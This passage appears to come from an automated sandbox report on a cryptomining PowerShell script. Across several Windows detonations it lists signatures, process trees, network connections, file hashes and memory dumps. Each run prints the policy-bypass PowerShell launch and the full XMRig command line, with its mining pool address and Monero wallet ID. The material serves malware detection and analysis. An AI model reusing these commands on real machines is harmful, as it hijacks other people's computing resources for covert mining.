| PID 4896 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
memory/4896-0-0x00007FFD9E693000-0x00007FFD9E695000-memory.dmp
memory/4896-1-0x000002A6F44A0000-0x000002A6F44C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_heweg4l2.rnn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4896-11-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-12-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-14-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-15-0x000002A6F4630000-0x000002A6F4642000-memory.dmp
memory/4896-16-0x000002A6F4490000-0x000002A6F449A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1800-47-0x0000022BBD810000-0x0000022BBD830000-memory.dmp
memory/1800-48-0x0000022C51790000-0x0000022C517B0000-memory.dmp
memory/1800-49-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-50-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-51-0x0000022C51DF0000-0x0000022C51E10000-memory.dmp
memory/1800-52-0x0000022C51E10000-0x0000022C51E30000-memory.dmp
memory/4896-53-0x00007FFD9E693000-0x00007FFD9E695000-memory.dmp
memory/4896-54-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/1800-55-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-56-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-57-0x0000022C51DF0000-0x0000022C51E10000-memory.dmp
memory/1800-58-0x0000022C51E10000-0x0000022C51E30000-memory.dmp
memory/1800-59-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-60-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-61-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-62-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-63-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-64-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-65-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-66-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-67-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-68-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-69-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-70-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-71-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-72-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-73-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-74-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-75-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-76-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-77-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-78-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-79-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-80-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-81-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-82-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-83-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-84-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-85-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-86-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-87-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-88-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-89-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-90-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-91-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-92-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-93-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-94-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-95-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-96-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-97-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-98-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-99-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-100-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-101-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-102-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-103-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-104-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-105-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-106-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-107-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-108-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-109-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-110-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-111-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-112-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-113-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-114-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-115-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-116-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-117-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2052 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2052 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.21:443 | | tcp |
Files
memory/2052-0-0x00007FF949803000-0x00007FF949805000-memory.dmp
memory/2052-6-0x000002772AEF0000-0x000002772AF12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5fd03uv.10d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2008 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2008 wrote to memory of 2608 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.253.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zf2qmvzk.vdl.psm1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:47
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1774s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2440 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2440 wrote to memory of 4248 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4x21pbfe.0r4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral27
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:51
Platform
win10v2004-20240226-en
Max time kernel
1799s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4444 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4444 wrote to memory of 3828 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3792 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1388 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwlsuo4k.mlm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:25
Platform
win10v2004-20240508-en
Max time kernel
1789s
Max time network
1743s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
